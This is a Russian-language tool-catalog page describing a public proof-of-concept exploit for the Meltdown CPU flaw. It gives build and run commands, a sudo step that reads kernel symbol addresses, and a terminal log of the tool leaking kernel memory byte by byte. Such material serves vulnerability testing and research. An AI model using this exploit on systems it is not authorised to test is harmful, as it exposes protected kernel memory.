Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
meltdown-exploit — Эксплойт Meltdown PoC | Kitploit
Инструменты/GitHubGitHub/paboldin/meltdown-exploit
Криминалистика памятиАнализ уязвимостейЭксплуатацияЭксплуатация Бинарных Файлов
GitHubpaboldin/meltdown-exploit

meltdown-exploit

Эксплойт Meltdown PoC

Репозиторий
94926358 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

MELTDOWN EXPLOIT POC

Спекулятивные оптимизации выполняют код небезопасным образом, оставляя следы данных в микроархитектуре, например, в кеше.

Lipp et al. 2018 опубликовали свой код 2018-01-09 по адресу https://github.com/IAIK/meltdown. Подробности в их статье: https://meltdownattack.com/meltdown.pdf.

На данный момент может выгружать только linux_proc_banner, так как требуется, чтобы доступная память была в кеше, а linux_proc_banner кешируется при каждом чтении из /proc/version. Возможно, работает с prefetch. Работает с sched_yield.

Сборка с помощью make, запуск с помощью ./run.sh.

Пока не может обойти KASLR, поэтому, возможно, потребуется ввести пароль для поиска linux_proc_banner в /proc/kallsyms (или сделать это вручную).

Подход Flush+Reload и целевой массив взяты из статьи о spectre https://spectreattack.com/spectre.pdf, реализованы по подсказкам из https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.

Ящик Пандоры открыт.

Взгляните на полный эксплойт, который работает с версией IAIK на моей машине.

Результат:

root@kitploit:~
$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk 
	/linux_proc_banner/ {
		if (strtonum("0x"$1))
			print $1;
		exit 0;
	} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20  
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20  
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20  
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 158
model name	: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping	: 9
microcode	: 0x5e
cpu MHz		: 3499.316
cache size	: 6144 KB
physical id	: 0

Работает на

Список уязвимых процессоров/ядер перенесён сюда: https://github.com/paboldin/meltdown-exploit/issues/19

Список неуязвимых процессоров/ядер перенесён сюда: https://github.com/paboldin/meltdown-exploit/issues/22

Скачать инструмент